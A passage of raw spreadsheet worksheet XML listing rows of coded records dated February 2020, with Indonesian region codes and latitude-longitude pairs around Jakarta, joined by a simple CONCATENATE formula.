        <v>33</v>
      </c>
      <c r="U1470" s="5">
        <v>10682340</v>
      </c>
      <c r="V1470" s="5" t="s">
        <v>15777</v>
      </c>
      <c r="W1470" s="5">
        <v>-622896</v>
      </c>
      <c r="X1470" t="s">
        <v>19544</v>
      </c>
      <c r="Y1470" t="str">
        <f t="shared" si="22"/>
        <v>-6.22896,106.82340</v>
      </c>
    </row>
    <row r="1471" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1471">
        <v>108995</v>
      </c>
      <c r="B1471" s="1">
        <v>43886</v>
      </c>
      <c r="C1471">
        <v>0</v>
      </c>
      <c r="D1471" t="s">
        <v>22</v>
      </c>
      <c r="E1471" t="s">
        <v>23</v>
      </c>
      <c r="F1471" t="s">
        <v>5119</v>
      </c>
      <c r="G1471" t="s">
        <v>5120</v>
      </c>
      <c r="H1471" t="s">
        <v>26</v>
      </c>
      <c r="I1471" t="s">
        <v>517</v>
      </c>
      <c r="J1471" t="s">
        <v>2595</v>
      </c>
      <c r="L1471" t="s">
        <v>5121</v>
      </c>
      <c r="M1471">
        <v>3175050003</v>
      </c>
      <c r="N1471">
        <v>3175050</v>
      </c>
      <c r="O1471">
        <v>3175</v>
      </c>
      <c r="P1471">
        <v>31</v>
      </c>
      <c r="Q1471" t="s">
        <v>1740</v>
      </c>
      <c r="R1471" t="s">
        <v>1013</v>
      </c>
      <c r="S1471" t="s">
        <v>547</v>
      </c>
      <c r="T1471" t="s">
        <v>33</v>
      </c>
      <c r="U1471" s="5">
        <v>10691013</v>
      </c>
      <c r="V1471" s="5" t="s">
        <v>15778</v>
      </c>
      <c r="W1471" s="5">
        <v>-617374</v>
      </c>
      <c r="X1471" t="s">
        <v>19545</v>
      </c>
      <c r="Y1471" t="str">
        <f t="shared" si="22"/>
        <v>-6.17374,106.91013</v>
      </c>
    </row>
    <row r="1472" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1472">
        <v>108996</v>
      </c>
      <c r="B1472" s="1">
        <v>43886</v>
      </c>
      <c r="C1472">
        <v>0</v>
      </c>
      <c r="D1472" t="s">
        <v>22</v>
      </c>
      <c r="E1472" t="s">
        <v>23</v>
      </c>
      <c r="F1472" s="3" t="s">
        <v>5122</v>
      </c>
      <c r="H1472" t="s">
        <v>26</v>
      </c>
      <c r="I1472" t="s">
        <v>882</v>
      </c>
      <c r="J1472" t="s">
        <v>2627</v>
      </c>
      <c r="L1472" t="s">
        <v>5123</v>
      </c>
      <c r="M1472">
        <v>3275020001</v>
      </c>
      <c r="N1472">
        <v>3275020</v>
      </c>
      <c r="O1472">
        <v>3275</v>
      </c>
      <c r="P1472">
        <v>32</v>
      </c>
      <c r="Q1472" t="s">
        <v>5124</v>
      </c>
      <c r="R1472" t="s">
        <v>828</v>
      </c>
      <c r="S1472" t="s">
        <v>41</v>
      </c>
      <c r="T1472" t="s">
        <v>42</v>
      </c>
      <c r="U1472" s="5">
        <v>10696098</v>
      </c>
      <c r="V1472" s="5" t="s">
        <v>15779</v>
      </c>
      <c r="W1472" s="5">
        <v>-632282</v>
      </c>
      <c r="X1472" t="s">
        <v>19546</v>
      </c>
      <c r="Y1472" t="str">
        <f t="shared" si="22"/>
        <v>-6.32282,106.96098</v>
      </c>
    </row>
    <row r="1473" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1473">
        <v>108997</v>
      </c>
      <c r="B1473" s="1">
        <v>43886</v>
      </c>
      <c r="C1473">
        <v>0</v>
      </c>
      <c r="D1473" t="s">
        <v>22</v>
      </c>
      <c r="E1473" t="s">
        <v>23</v>
      </c>
      <c r="F1473" t="s">
        <v>5125</v>
      </c>
      <c r="G1473" t="s">
        <v>5126</v>
      </c>
      <c r="H1473" t="s">
        <v>26</v>
      </c>
      <c r="I1473" t="s">
        <v>1477</v>
      </c>
      <c r="J1473" t="s">
        <v>577</v>
      </c>
      <c r="L1473" t="s">
        <v>5127</v>
      </c>
      <c r="M1473">
        <v>3174010006</v>
      </c>
      <c r="N1473">
        <v>3174010</v>
      </c>
      <c r="O1473">
        <v>3174</v>
      </c>
      <c r="P1473">
        <v>31</v>
      </c>
      <c r="Q1473" t="s">
        <v>268</v>
      </c>
      <c r="R1473" t="s">
        <v>69</v>
      </c>
      <c r="S1473" t="s">
        <v>32</v>
      </c>
      <c r="T1473" t="s">
        <v>33</v>
      </c>
      <c r="U1473" s="5">
        <v>10673894</v>
      </c>
      <c r="V1473" s="5" t="s">
        <v>15780</v>
      </c>
      <c r="W1473" s="5">
        <v>-617424</v>
      </c>
      <c r="X1473" t="s">
        <v>19547</v>
      </c>
      <c r="Y1473" t="str">
        <f t="shared" si="22"/>
        <v>-6.17424,106.73894</v>
      </c>
    </row>
    <row r="1474" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1474">
        <v>108998</v>
      </c>
      <c r="B1474" s="1">
        <v>43886</v>
      </c>
      <c r="C1474">
        <v>0</v>
      </c>
      <c r="D1474" t="s">
        <v>22</v>
      </c>
      <c r="E1474" t="s">
        <v>23</v>
      </c>
      <c r="F1474" s="3" t="s">
        <v>5128</v>
      </c>
      <c r="G1474" t="s">
        <v>5129</v>
      </c>
      <c r="H1474" t="s">
        <v>26</v>
      </c>
      <c r="I1474" t="s">
        <v>1009</v>
      </c>
      <c r="J1474" t="s">
        <v>387</v>
      </c>
      <c r="L1474" t="s">
        <v>5130</v>
      </c>
      <c r="M1474">
        <v>3174040007</v>
      </c>
      <c r="N1474">
        <v>3174040</v>
      </c>
      <c r="O1474">
        <v>3174</v>
      </c>
      <c r="P1474">
        <v>31</v>
      </c>
      <c r="Q1474" t="s">
        <v>389</v>
      </c>
      <c r="R1474" t="s">
        <v>377</v>
      </c>
      <c r="S1474" t="s">
        <v>32</v>
      </c>
      <c r="T1474" t="s">
        <v>33</v>
      </c>
      <c r="U1474" s="5">
        <v>10678234</v>
      </c>
      <c r="V1474" s="5" t="s">
        <v>15781</v>
      </c>
      <c r="W1474" s="5">
        <v>-614675</v>
      </c>
      <c r="X1474" t="s">
        <v>19548</v>
      </c>
      <c r="Y1474" t="str">
        <f t="shared" si="22"/>
        <v>-6.14675,106.78234</v>
      </c>
    </row>
    <row r="1475" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1475">
        <v>108999</v>
      </c>
      <c r="B1475" s="1">
        <v>43886</v>
      </c>
      <c r="C1475">
        <v>0</v>
      </c>
      <c r="D1475" t="s">
        <v>22</v>
      </c>
      <c r="E1475" t="s">
        <v>23</v>
      </c>
      <c r="F1475" t="s">
        <v>5131</v>
      </c>
      <c r="G1475" t="s">
        <v>5132</v>
      </c>
      <c r="H1475" t="s">
        <v>26</v>
      </c>
      <c r="I1475" t="s">
        <v>1542</v>
      </c>
      <c r="J1475" t="s">
        <v>644</v>
      </c>
      <c r="L1475" t="s">
        <v>5133</v>
      </c>
      <c r="M1475">
        <v>3174070002</v>
      </c>
      <c r="N1475">
        <v>3174070</v>
      </c>
      <c r="O1475">
        <v>3174</v>
      </c>
      <c r="P1475">
        <v>31</v>
      </c>
      <c r="Q1475" t="s">
        <v>621</v>
      </c>
      <c r="R1475" t="s">
        <v>84</v>
      </c>
      <c r="S1475" t="s">
        <v>32</v>
      </c>
      <c r="T1475" t="s">
        <v>33</v>
      </c>
      <c r="U1475" s="5">
        <v>10674600</v>
      </c>
      <c r="V1475" s="5" t="s">
        <v>15782</v>
      </c>
      <c r="W1475" s="5">
        <v>-616344</v>
      </c>
      <c r="X1475" t="s">
        <v>19549</v>
      </c>
      <c r="Y1475" t="str">
        <f t="shared" ref="Y1475:Y1538" si="23">CONCATENATE(X1475,",",V1475)</f>
        <v>-6.16344,106.74600</v>
      </c>
    </row>
    <row r="1476" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1476">
        <v>109000</v>
      </c>
      <c r="B1476" s="1">
        <v>43886</v>
      </c>
      <c r="C1476">
        <v>0</v>
      </c>
      <c r="D1476" t="s">
        <v>22</v>
      </c>
      <c r="E1476" t="s">
        <v>23</v>
      </c>
      <c r="F1476" t="s">
        <v>5134</v>
      </c>
      <c r="G1476" t="s">
        <v>5135</v>
      </c>
      <c r="H1476" t="s">
        <v>26</v>
      </c>
      <c r="I1476" t="s">
        <v>882</v>
      </c>
      <c r="J1476" t="s">
        <v>2627</v>
      </c>
      <c r="M1476">
        <v>3275040007</v>
      </c>
      <c r="N1476">
        <v>3275040</v>
      </c>
      <c r="O1476">
        <v>3275</v>
      </c>
      <c r="P1476">
        <v>32</v>
      </c>
      <c r="Q1476" t="s">
        <v>99</v>
      </c>
      <c r="R1476" t="s">
        <v>100</v>
      </c>
      <c r="S1476" t="s">
        <v>41</v>
      </c>
      <c r="T1476" t="s">
        <v>42</v>
      </c>
      <c r="U1476" s="5">
        <v>10702496</v>
      </c>
      <c r="V1476" s="5" t="s">
        <v>15783</v>
      </c>
      <c r="W1476" s="5">
        <v>-623013</v>
      </c>
      <c r="X1476" t="s">
        <v>19550</v>
      </c>
      <c r="Y1476" t="str">
        <f t="shared" si="23"/>
        <v>-6.23013,107.02496</v>
      </c>
    </row>
    <row r="1477" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1477">
        <v>109001</v>
      </c>
      <c r="B1477" s="1">
        <v>43886</v>
      </c>
      <c r="C1477">
        <v>0</v>
      </c>
      <c r="D1477" t="s">
        <v>22</v>
      </c>
      <c r="E1477" t="s">
        <v>23</v>
      </c>
      <c r="F1477" t="s">
        <v>5136</v>
      </c>
      <c r="G1477" t="s">
        <v>5137</v>
      </c>
      <c r="H1477" t="s">
        <v>26</v>
      </c>
      <c r="I1477" t="s">
        <v>1055</v>
      </c>
      <c r="J1477" t="s">
        <v>4333</v>
      </c>
      <c r="M1477">
        <v>3174070003</v>
      </c>
      <c r="N1477">
        <v>3174070</v>
      </c>
      <c r="O1477">
        <v>3174</v>
      </c>
      <c r="P1477">
        <v>31</v>
      </c>
      <c r="Q1477" t="s">
        <v>1260</v>
      </c>
      <c r="R1477" t="s">
        <v>84</v>
      </c>
      <c r="S1477" t="s">
        <v>32</v>
      </c>
      <c r="T1477" t="s">
        <v>33</v>
      </c>
      <c r="U1477" s="5">
        <v>10675613</v>
      </c>
      <c r="V1477" s="5" t="s">
        <v>15784</v>
      </c>
      <c r="W1477" s="5">
        <v>-615678</v>
      </c>
      <c r="X1477" t="s">
        <v>19551</v>
      </c>
      <c r="Y1477" t="str">
        <f t="shared" si="23"/>
        <v>-6.15678,106.75613</v>
      </c>
    </row>
    <row r="1478" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1478">
        <v>109002</v>
      </c>
      <c r="B1478" s="1">
        <v>43886</v>
      </c>
      <c r="C1478">
        <v>0</v>
      </c>
      <c r="D1478" t="s">
        <v>22</v>
      </c>
      <c r="E1478" t="s">
        <v>23</v>
      </c>
      <c r="F1478" t="s">
        <v>5138</v>
      </c>
      <c r="G1478" t="s">
        <v>5139</v>
      </c>
      <c r="H1478" t="s">
        <v>26</v>
      </c>
      <c r="I1478" t="s">
        <v>4361</v>
      </c>
      <c r="J1478" t="s">
        <v>530</v>
      </c>
      <c r="L1478" t="s">
        <v>5140</v>
      </c>
      <c r="M1478">
        <v>3174020006</v>
      </c>
      <c r="N1478">
        <v>3174020</v>
      </c>
      <c r="O1478">
        <v>3174</v>
      </c>
      <c r="P1478">
        <v>31</v>
      </c>
      <c r="Q1478" t="s">
        <v>427</v>
      </c>
      <c r="R1478" t="s">
        <v>31</v>
      </c>
      <c r="S1478" t="s">
        <v>32</v>
      </c>
      <c r="T1478" t="s">
        <v>33</v>
      </c>
      <c r="U1478" s="5">
        <v>10675853</v>
      </c>
      <c r="V1478" s="5" t="s">
        <v>15785</v>
      </c>
      <c r="W1478" s="5">
        <v>-618726</v>
      </c>
      <c r="X1478" t="s">
        <v>19552</v>
      </c>
      <c r="Y1478" t="str">
        <f t="shared" si="23"/>
        <v>-6.18726,106.75853</v>
      </c>
    </row>
    <row r="1479" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1479">
        <v>109003</v>
      </c>
      <c r="B1479" s="1">
        <v>43886</v>
      </c>
      <c r="C1479">
        <v>0</v>
      </c>
      <c r="D1479" t="s">
        <v>22</v>
      </c>
      <c r="E1479" t="s">
        <v>23</v>
      </c>
      <c r="F1479" t="s">
        <v>5141</v>
      </c>
      <c r="G1479" t="s">
        <v>5142</v>
      </c>
      <c r="H1479" t="s">
        <v>26</v>
      </c>
      <c r="I1479" t="s">
        <v>5143</v>
      </c>
      <c r="J1479" t="s">
        <v>2341</v>
      </c>
      <c r="L1479" t="s">
        <v>5144</v>
      </c>
      <c r="M1479">
        <v>3172070006</v>
      </c>
      <c r="N1479">
        <v>3172070</v>
      </c>
      <c r="O1479">
        <v>3172</v>
      </c>
      <c r="P1479">
        <v>31</v>
      </c>
      <c r="Q1479" t="s">
        <v>2342</v>
      </c>
      <c r="R1479" t="s">
        <v>128</v>
      </c>
      <c r="S1479" t="s">
        <v>49</v>
      </c>
      <c r="T1479" t="s">
        <v>33</v>
      </c>
      <c r="U1479" s="5">
        <v>10692667</v>
      </c>
      <c r="V1479" s="5" t="s">
        <v>15786</v>
      </c>
      <c r="W1479" s="5">
        <v>-623072</v>
      </c>
      <c r="X1479" t="s">
        <v>19553</v>
      </c>
      <c r="Y1479" t="str">
        <f t="shared" si="23"/>
        <v>-6.23072,106.92667</v>
      </c>
    </row>
    <row r="1480" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1480">
        <v>109004</v>
      </c>
      <c r="B1480" s="1">
        <v>43886</v>
      </c>
      <c r="C1480">
        <v>0</v>
      </c>
      <c r="D1480" t="s">
        <v>22</v>
      </c>
      <c r="E1480" t="s">
        <v>23</v>
      </c>
      <c r="F1480" t="s">
        <v>5145</v>
      </c>
      <c r="H1480" t="s">
        <v>26</v>
      </c>
      <c r="I1480" t="s">
        <v>181</v>
      </c>
      <c r="J1480" t="s">
        <v>4778</v>
      </c>
      <c r="L1480" t="s">
        <v>5146</v>
      </c>
      <c r="M1480">
        <v>3174020004</v>
      </c>
      <c r="N1480">
        <v>3174020</v>
      </c>
      <c r="O1480">
        <v>3174</v>
      </c>
      <c r="P1480">
        <v>31</v>
      </c>
      <c r="Q1480" t="s">
        <v>31</v>
      </c>
      <c r="R1480" t="s">
        <v>31</v>
      </c>
      <c r="S1480" t="s">
        <v>32</v>
      </c>
      <c r="T1480" t="s">
        <v>33</v>
      </c>
      <c r="U1480" s="5">
        <v>10676896</v>
      </c>
      <c r="V1480" s="5" t="s">
        <v>15787</v>
      </c>
      <c r="W1480" s="5">
        <v>-619796</v>
      </c>
      <c r="X1480" t="s">
        <v>19554</v>
      </c>
      <c r="Y1480" t="str">
        <f t="shared" si="23"/>
        <v>-6.19796,106.76896</v>
      </c>
    </row>
    <row r="1481" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1481">
        <v>109005</v>
      </c>
      <c r="B1481" s="1">
        <v>43886</v>
      </c>
      <c r="C1481">
        <v>0</v>
      </c>
      <c r="D1481" t="s">
        <v>22</v>
      </c>
      <c r="E1481" t="s">
        <v>23</v>
      </c>
      <c r="F1481" t="s">
        <v>5147</v>
      </c>
      <c r="G1481" t="s">
        <v>5148</v>
      </c>
      <c r="H1481" t="s">
        <v>26</v>
      </c>
      <c r="I1481" t="s">
        <v>2293</v>
      </c>
      <c r="J1481" t="s">
        <v>5149</v>
      </c>
      <c r="M1481">
        <v>3175030001</v>
      </c>
      <c r="N1481">
        <v>3175030</v>
      </c>
      <c r="O1481">
        <v>3175</v>
      </c>
      <c r="P1481">
        <v>31</v>
      </c>
      <c r="Q1481" t="s">
        <v>1574</v>
      </c>
      <c r="R1481" t="s">
        <v>1563</v>
      </c>
      <c r="S1481" t="s">
        <v>547</v>
      </c>
      <c r="T1481" t="s">
        <v>33</v>
      </c>
      <c r="U1481" s="5">
        <v>10685640</v>
      </c>
      <c r="V1481" s="5" t="s">
        <v>15788</v>
      </c>
      <c r="W1481" s="5">
        <v>-615032</v>
      </c>
      <c r="X1481" t="s">
        <v>19555</v>
      </c>
      <c r="Y1481" t="str">
        <f t="shared" si="23"/>
        <v>-6.15032,106.85640</v>
      </c>
    </row>
    <row r="1482" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1482">
        <v>109006</v>
      </c>
      <c r="B1482" s="1">
        <v>43886</v>
      </c>
      <c r="C1482">
        <v>0</v>
      </c>
      <c r="D1482" t="s">
        <v>22</v>
      </c>
      <c r="E1482" t="s">
        <v>23</v>
      </c>
      <c r="F1482" t="s">
        <v>5150</v>
      </c>
      <c r="G1482" t="s">
        <v>5151</v>
      </c>
      <c r="H1482" t="s">
        <v>26</v>
      </c>
      <c r="I1482" t="s">
        <v>2293</v>
      </c>
      <c r="J1482" t="s">
        <v>2627</v>
      </c>
      <c r="L1482" t="s">
        <v>5152</v>
      </c>
      <c r="M1482">
        <v>3275061004</v>
      </c>
      <c r="N1482">
        <v>3275061</v>
      </c>
      <c r="O1482">
        <v>3275</v>
      </c>
      <c r="P1482">
        <v>32</v>
      </c>
      <c r="Q1482" t="s">
        <v>39</v>
      </c>
      <c r="R1482" t="s">
        <v>40</v>
      </c>
      <c r="S1482" t="s">
        <v>41</v>
      </c>
      <c r="T1482" t="s">
        <v>42</v>
      </c>
      <c r="U1482" s="5">
        <v>10699183</v>
      </c>
      <c r="V1482" s="5" t="s">
        <v>15789</v>
      </c>
      <c r="W1482" s="5">
        <v>-618816</v>
      </c>
      <c r="X1482" t="s">
        <v>19556</v>
      </c>
      <c r="Y1482" t="str">
        <f t="shared" si="23"/>
        <v>-6.18816,106.99183</v>
      </c>
    </row>
    <row r="1483" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1483">
        <v>109007</v>
      </c>
      <c r="B1483" s="1">
        <v>43886</v>
      </c>
      <c r="C1483">
        <v>0</v>
      </c>
      <c r="D1483" t="s">
        <v>22</v>
      </c>
      <c r="E1483" t="s">
        <v>23</v>
      </c>
      <c r="F1483" t="s">
        <v>5153</v>
      </c>
      <c r="H1483" t="s">
        <v>26</v>
      </c>
      <c r="I1483" t="s">
        <v>5154</v>
      </c>
      <c r="J1483" t="s">
        <v>1471</v>
      </c>
      <c r="L1483" t="s">
        <v>5155</v>
      </c>
      <c r="M1483">
        <v>3171100001</v>
      </c>
      <c r="N1483">
        <v>3171100</v>
      </c>
      <c r="O1483">
        <v>3171</v>
      </c>
      <c r="P1483">
        <v>31</v>
      </c>
      <c r="Q1483" t="s">
        <v>1474</v>
      </c>
      <c r="R1483" t="s">
        <v>107</v>
      </c>
      <c r="S1483" t="s">
        <v>108</v>
      </c>
      <c r="T1483" t="s">
        <v>33</v>
      </c>
      <c r="U1483" s="5">
        <v>10681776</v>
      </c>
      <c r="V1483" s="5" t="s">
        <v>15790</v>
      </c>
      <c r="W1483" s="5">
        <v>-622049</v>
      </c>
      <c r="X1483" t="s">
        <v>19557</v>
      </c>
      <c r="Y1483" t="str">
        <f t="shared" si="23"/>
        <v>-6.22049,106.81776</v>
      </c>
    </row>
    <row r="1484" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1484">
        <v>109008</v>
      </c>
      <c r="B1484" s="1">
        <v>43886</v>
      </c>
      <c r="C1484">
        <v>0</v>
      </c>
      <c r="D1484" t="s">
        <v>22</v>
      </c>
      <c r="E1484" t="s">
        <v>23</v>
      </c>
      <c r="F1484" t="s">
        <v>5156</v>
      </c>
      <c r="G1484" t="s">
        <v>5157</v>
      </c>
      <c r="H1484" t="s">
        <v>26</v>
      </c>
      <c r="I1484" t="s">
        <v>2962</v>
      </c>
      <c r="J1484" t="s">
        <v>3135</v>
      </c>
      <c r="M1484">
        <v>3174070001</v>
      </c>
      <c r="N1484">
        <v>3174070</v>
      </c>
      <c r="O1484">
        <v>3174</v>
      </c>
      <c r="P1484">
        <v>31</v>
      </c>
      <c r="Q1484" t="s">
        <v>83</v>
      </c>
      <c r="R1484" t="s">
        <v>84</v>
      </c>
      <c r="S1484" t="s">
        <v>32</v>
      </c>
      <c r="T1484" t="s">
        <v>33</v>
      </c>
      <c r="U1484" s="5">
        <v>10672127</v>
      </c>
      <c r="V1484" s="5" t="s">
        <v>15791</v>
      </c>
      <c r="W1484" s="5">
        <v>-618652</v>
      </c>
      <c r="X1484" t="s">
        <v>19558</v>
      </c>
      <c r="Y1484" t="str">
        <f t="shared" si="23"/>
        <v>-6.18652,106.72127</v>
      </c>
    </row>
    <row r="1485" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1485">
        <v>109009</v>
      </c>
      <c r="B1485" s="1">
        <v>43886</v>
      </c>
      <c r="C1485">
        <v>0</v>
      </c>
      <c r="D1485" t="s">
        <v>22</v>
      </c>
      <c r="E1485" t="s">
        <v>23</v>
      </c>
      <c r="F1485" t="s">
        <v>5158</v>
      </c>
      <c r="G1485" t="s">
        <v>5159</v>
      </c>
      <c r="H1485" t="s">
        <v>26</v>
      </c>
      <c r="I1485" t="s">
        <v>181</v>
      </c>
      <c r="J1485" t="s">
        <v>2919</v>
      </c>
      <c r="L1485" t="s">
        <v>5160</v>
      </c>
      <c r="M1485">
        <v>3172090004</v>
      </c>
      <c r="N1485">
        <v>3172090</v>
      </c>
      <c r="O1485">
        <v>3172</v>
      </c>
      <c r="P1485">
        <v>31</v>
      </c>
      <c r="Q1485" t="s">
        <v>889</v>
      </c>
      <c r="R1485" t="s">
        <v>890</v>
      </c>
      <c r="S1485" t="s">
        <v>49</v>
      </c>
      <c r="T1485" t="s">
        <v>33</v>
      </c>
      <c r="U1485" s="5">
        <v>10689841</v>
      </c>
      <c r="V1485" s="5" t="s">
        <v>15792</v>
      </c>
      <c r="W1485" s="5">
        <v>-619868</v>
      </c>
      <c r="X1485" t="s">
        <v>19559</v>
      </c>
      <c r="Y1485" t="str">
        <f t="shared" si="23"/>
        <v>-6.19868,106.89841</v>
      </c>
    </row>
    <row r="1486" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1486">
        <v>109010</v>
      </c>
      <c r="B1486" s="1">
        <v>43886</v>
      </c>
      <c r="C1486">
        <v>0</v>
      </c>
      <c r="D1486" t="s">
        <v>22</v>
      </c>
      <c r="E1486" t="s">
        <v>23</v>
      </c>
      <c r="F1486" t="s">
        <v>5161</v>
      </c>
      <c r="H1486" t="s">
        <v>26</v>
      </c>
      <c r="I1486" t="s">
        <v>166</v>
      </c>
      <c r="J1486" t="s">
        <v>2627</v>
      </c>
      <c r="L1486" t="s">
        <v>5162</v>
      </c>
      <c r="M1486">
        <v>3216071008</v>
      </c>
      <c r="N1486">
        <v>3216071</v>
      </c>
      <c r="O1486">
        <v>3216</v>
      </c>
      <c r="P1486">
        <v>32</v>
      </c>
      <c r="Q1486" t="s">
        <v>2012</v>
      </c>
      <c r="R1486" t="s">
        <v>2013</v>
      </c>
      <c r="S1486" t="s">
        <v>41</v>
      </c>
      <c r="T1486" t="s">
        <v>42</v>
      </c>
      <c r="U1486" s="5">
        <v>10709549</v>
      </c>
      <c r="V1486" s="5" t="s">
        <v>15793</v>
      </c>
      <c r="W1486" s="5">
        <v>-627269</v>
      </c>
      <c r="X1486" t="s">
        <v>19560</v>
      </c>
      <c r="Y1486" t="str">
        <f t="shared" si="23"/>
        <v>-6.27269,107.09549</v>
      </c>
    </row>
    <row r="1487" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1487">
        <v>109011</v>
      </c>
      <c r="B1487" s="1">
        <v>43886</v>
      </c>
      <c r="C1487">
        <v>0</v>
      </c>
      <c r="D1487" t="s">
        <v>22</v>
      </c>
      <c r="E1487" t="s">
        <v>23</v>
      </c>
      <c r="F1487" t="s">
        <v>5163</v>
      </c>
      <c r="G1487" t="s">
        <v>5164</v>
      </c>
      <c r="H1487" t="s">
        <v>26</v>
      </c>
      <c r="I1487" t="s">
        <v>555</v>
      </c>
      <c r="J1487" t="s">
        <v>3135</v>
      </c>
      <c r="L1487" t="s">
        <v>5165</v>
      </c>
      <c r="M1487">
        <v>3671011002</v>
      </c>
      <c r="N1487">
        <v>3671011</v>
      </c>
      <c r="O1487">
        <v>3671</v>
      </c>
      <c r="P1487">
        <v>36</v>
      </c>
      <c r="Q1487" t="s">
        <v>5166</v>
      </c>
      <c r="R1487" t="s">
        <v>701</v>
      </c>
      <c r="S1487" t="s">
        <v>201</v>
      </c>
      <c r="T1487" t="s">
        <v>171</v>
      </c>
      <c r="U1487" s="5">
        <v>10672474</v>
      </c>
      <c r="V1487" s="5" t="s">
        <v>15794</v>
      </c>
      <c r="W1487" s="5">
        <v>-623981</v>
      </c>
      <c r="X1487" t="s">
        <v>19561</v>
      </c>
      <c r="Y1487" t="str">
        <f t="shared" si="23"/>
        <v>-6.23981,106.72474</v>
      </c>
    </row>
    <row r="1488" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1488">
        <v>109012</v>
      </c>
      <c r="B1488" s="1">
        <v>43886</v>
      </c>
      <c r="C1488">
        <v>0</v>
      </c>
      <c r="D1488" t="s">
        <v>22</v>
      </c>
      <c r="E1488" t="s">
        <v>23</v>
      </c>
      <c r="F1488" t="s">
        <v>5167</v>
      </c>
      <c r="H1488" t="s">
        <v>26</v>
      </c>
      <c r="I1488" t="s">
        <v>1046</v>
      </c>
      <c r="J1488" t="s">
        <v>28</v>
      </c>
      <c r="L1488" t="s">
        <v>5168</v>
      </c>
      <c r="M1488">
        <v>3174020005</v>
      </c>
      <c r="N1488">
        <v>3174020</v>
      </c>
      <c r="O1488">
        <v>3174</v>
      </c>
      <c r="P1488">
        <v>31</v>
      </c>
      <c r="Q1488" t="s">
        <v>30</v>
      </c>
      <c r="R1488" t="s">
        <v>31</v>
      </c>
      <c r="S1488" t="s">
        <v>32</v>
      </c>
      <c r="T1488" t="s">
        <v>33</v>
      </c>
      <c r="U1488" s="5">
        <v>10676869</v>
      </c>
      <c r="V1488" s="5" t="s">
        <v>15795</v>
      </c>
      <c r="W1488" s="5">
        <v>-616978</v>
      </c>
      <c r="X1488" t="s">
        <v>18266</v>
      </c>
      <c r="Y1488" t="str">
        <f t="shared" si="23"/>
        <v>-6.16978,106.76869</v>
      </c>
    </row>
    <row r="1489" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1489">
        <v>109013</v>
      </c>
      <c r="B1489" s="1">
        <v>43886</v>
      </c>
      <c r="C1489">
        <v>0</v>
      </c>
      <c r="D1489" t="s">
        <v>22</v>
      </c>
      <c r="E1489" t="s">
        <v>23</v>
      </c>
      <c r="F1489" t="s">
        <v>5169</v>
      </c>
      <c r="G1489" t="s">
        <v>5170</v>
      </c>
      <c r="H1489" t="s">
        <v>26</v>
      </c>
      <c r="I1489" t="s">
        <v>367</v>
      </c>
      <c r="J1489" t="s">
        <v>5171</v>
      </c>
      <c r="L1489" t="s">
        <v>5172</v>
      </c>
      <c r="M1489">
        <v>3175010004</v>
      </c>
      <c r="N1489">
        <v>3175010</v>
      </c>
      <c r="O1489">
        <v>3175</v>
      </c>
      <c r="P1489">
        <v>31</v>
      </c>
      <c r="Q1489" t="s">
        <v>546</v>
      </c>
      <c r="R1489" t="s">
        <v>546</v>
      </c>
      <c r="S1489" t="s">
        <v>547</v>
      </c>
      <c r="T1489" t="s">
        <v>33</v>
      </c>
      <c r="U1489" s="5">
        <v>10680440</v>
      </c>
      <c r="V1489" s="5" t="s">
        <v>15796</v>
      </c>
      <c r="W1489" s="5">
        <v>-611418</v>
      </c>
      <c r="X1489" t="s">
        <v>19562</v>
      </c>
      <c r="Y1489" t="str">
        <f t="shared" si="23"/>
        <v>-6.11418,106.80440</v>
      </c>
    </row>
    <row r="1490" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1490">
        <v>109014</v>
      </c>
      <c r="B1490" s="1">
        <v>43886</v>
      </c>
      <c r="C1490">
        <v>0</v>
      </c>
      <c r="D1490" t="s">
        <v>22</v>
      </c>
      <c r="E1490" t="s">
        <v>23</v>
      </c>
      <c r="F1490" t="s">
        <v>5173</v>
      </c>
      <c r="G1490" t="s">
        <v>5174</v>
      </c>
      <c r="H1490" t="s">
        <v>26</v>
      </c>
      <c r="I1490" t="s">
        <v>511</v>
      </c>
      <c r="J1490" t="s">
        <v>723</v>
      </c>
      <c r="L1490" t="s">
        <v>5175</v>
      </c>
      <c r="M1490">
        <v>3174070002</v>
      </c>
      <c r="N1490">
        <v>3174070</v>
      </c>
      <c r="O1490">
        <v>3174</v>
      </c>
      <c r="P1490">
        <v>31</v>
      </c>
      <c r="Q1490" t="s">
        <v>621</v>
      </c>
      <c r="R1490" t="s">
        <v>84</v>
      </c>
      <c r="S1490" t="s">
        <v>32</v>
      </c>
      <c r="T1490" t="s">
        <v>33</v>
      </c>
      <c r="U1490" s="5">
        <v>10674588</v>
      </c>
      <c r="V1490" s="5" t="s">
        <v>14640</v>
      </c>
      <c r="W1490" s="5">
        <v>-616383</v>
      </c>
      <c r="X1490" t="s">
        <v>19563</v>
      </c>
      <c r="Y1490" t="str">
        <f t="shared" si="23"/>
        <v>-6.16383,106.74588</v>
      </c>
    </row>
    <row r="1491" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1491">
        <v>109015</v>
      </c>
      <c r="B1491" s="1">
        <v>43886</v>
      </c>
      <c r="C1491">
        <v>0</v>
      </c>
      <c r="D1491" t="s">
        <v>22</v>
      </c>
      <c r="E1491" t="s">
        <v>23</v>
      </c>
      <c r="F1491" t="s">
        <v>5176</v>
      </c>
      <c r="G1491" t="s">
        <v>5177</v>
      </c>
      <c r="H1491" t="s">
        <v>26</v>
      </c>
      <c r="I1491" t="s">
        <v>383</v>
      </c>
      <c r="J1491" t="s">
        <v>2627</v>
      </c>
      <c r="M1491">
        <v>3213190007</v>
      </c>
      <c r="N1491">
        <v>3213190</v>
      </c>
      <c r="O1491">
